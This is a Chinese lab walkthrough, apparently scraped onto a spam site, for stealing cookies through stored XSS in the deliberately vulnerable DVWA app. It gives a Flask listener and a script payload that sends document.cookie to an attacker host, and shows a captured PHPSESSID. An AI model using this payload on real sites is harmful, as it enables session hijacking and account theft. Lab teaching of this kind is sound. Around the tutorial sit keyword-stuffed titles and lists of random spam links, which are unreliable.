当前位置: 首页 > wzjs >正文

西宁市网站设计高端好用的html模板网站

西宁市网站设计高端,好用的html模板网站,p2p网站开发的多少钱,免费建筑设计软件🧪 第一步:准备监听服务接收 cookie 在你的本机(非容器)或 DVWA 所在主机运行以下 Python 监听代码,用于接收窃取的 cookie: 启动 HTTP 接收服务 # 在本机终端运行,监听 8081 端口&#xff0…

🧪 第一步:准备监听服务接收 cookie

在你的本机(非容器)或 DVWA 所在主机运行以下 Python 监听代码,用于接收窃取的 cookie:

启动 HTTP 接收服务

# 在本机终端运行,监听 8081 端口(确保防火墙允许)
python3 -m http.server 8081

在这里插入图片描述
注意:CentOS 7 默认开启了 firewalld,你需要允许 8081 端口访问:

firewall-cmd --add-port=8081/tcp --permanent
firewall-cmd --reload

确认能访问你的监听服务器:

curl http://《监听机IP》:8081

在这里插入图片描述

或者你也可以用 Flask 搭建更真实的监听:

# listener.py
from flask import Flask, requestapp = Flask(__name__)@app.route('/log')
def log():cookie = request.args.get('c')print(f"Stolen cookie: {cookie}")return '', 204if __name__ == '__main__':app.run(host='0.0.0.0', port=8081)

运行:

python3 listener.py

🧪 第二步:注入 Payload 到 DVWA 的 Stored XSS 页面

1.拉取 DVWA 镜像并运行:docker run --rm -it -p 8080:80 vulnerables/web-dvwa
2.打开浏览器访问你的 DVWA:http://localhost:8080/vulnerabilities/xss_s/
3.将以下 payload 作为留言输入:

🍪 Cookie 窃取 Payload:

<script>new Image().src="http://<你的主机IP>:8081/log?c="+document.cookie;
</script>

替换 <你的主机IP> 为你运行监听服务的真实 IP 地址。容器里访问主机可以用:

Linux 宿主:172.17.0.1

Windows/macOS Docker:host.docker.internal(需要开启端口映射)

在这里插入图片描述

✅ 第三步:触发注入点

1.提交留言后,访问该页面会触发脚本

2.你监听服务的终端中应会看到类似输出:

Stolen cookie: security=low; PHPSESSID=abcd1234xyz

在这里插入图片描述

如果能看到 cookie 值被打印,就说明 成功窃取 cookie 并 exfiltrate 出去了。


文章转载自:

http://BiZMugsO.LLgpk.cn
http://ATfWA0QY.LLgpk.cn
http://HD36CL3T.LLgpk.cn
http://bhZp7afK.LLgpk.cn
http://FB1d5fyy.LLgpk.cn
http://USgVjIhq.LLgpk.cn
http://xbL0UqW5.LLgpk.cn
http://dA4oNBy7.LLgpk.cn
http://zcCjxrJo.LLgpk.cn
http://iVhqtrVw.LLgpk.cn
http://dd65nkfw.LLgpk.cn
http://2BofQbCH.LLgpk.cn
http://grfZzXQ7.LLgpk.cn
http://KnSuejoB.LLgpk.cn
http://W6GqTo3e.LLgpk.cn
http://0HXrrIR6.LLgpk.cn
http://T7GCmref.LLgpk.cn
http://rbhgjtKN.LLgpk.cn
http://XvLocFuJ.LLgpk.cn
http://FHSHUwTk.LLgpk.cn
http://1GaJ7uYl.LLgpk.cn
http://Ittikyik.LLgpk.cn
http://DGCDC26U.LLgpk.cn
http://zMTT5RQD.LLgpk.cn
http://T7npOAIQ.LLgpk.cn
http://xUtg8vAw.LLgpk.cn
http://zDn59ISy.LLgpk.cn
http://I2hhFWZh.LLgpk.cn
http://75DT8vzo.LLgpk.cn
http://SiDTD4yc.LLgpk.cn
http://www.dtcms.com/wzjs/635320.html

相关文章:

  • 北京网站建设设计网页设计商品页面制作
  • 南京优质网站建设方案江苏seo推广方案
  • 广东网站营销seo费用怎么制作图片带字
  • 义乌建站门户网站的重要性
  • 食品饮料网站建设wordpress代码高亮在线转换工具
  • wordpress 文章连续seo技巧是什么
  • 基于cms设计网站的背景意义怎么在网上卖东西赚钱
  • 榆次小学网站建设wordpress装主题失败
  • 中小企业商务网站建设自助建设wap网站
  • 海洋cms做电影网站好做吗群晖wordpress端口
  • 微信 微网站ios开发者网站
  • 什么网站源码做分类信息网站好天津seo标准
  • wordpress 艺术 主题 2018长沙网络seo公司助企业突破
  • 做网站的相关术语你不会百度吗网页生成
  • 网站开发什么开发语言好做网站申请域名的流程
  • 无锡网站优化排名推广免费咨询骨科医生回答在线
  • 网站业务员好做吗php网站开发专员招聘
  • 写作的网站有哪些帝国cms做网站流程
  • 嘉兴城乡建设局门户网站python爬数据做网站
  • 广州海珠区赤岗 新港网站建设公司wordpress禁止采集
  • 启源网站建设没电脑可以建网站吗
  • 做vlogger的网站有哪些网站如何建设成直播间
  • wordpress首页很慢福州seo代理计费
  • 2021手机能看的网站网站开发难学吗
  • 丰涵网站建设科技高端网站源码
  • 石家庄网站开发费用常州网站建设公司如何
  • 购物网站创建珠海网站建设推广
  • 广州网站seo招聘vs2008做网站
  • php网站开发就业前景最大的购物平台
  • 有没有做公章的网站想学计算机怎么入门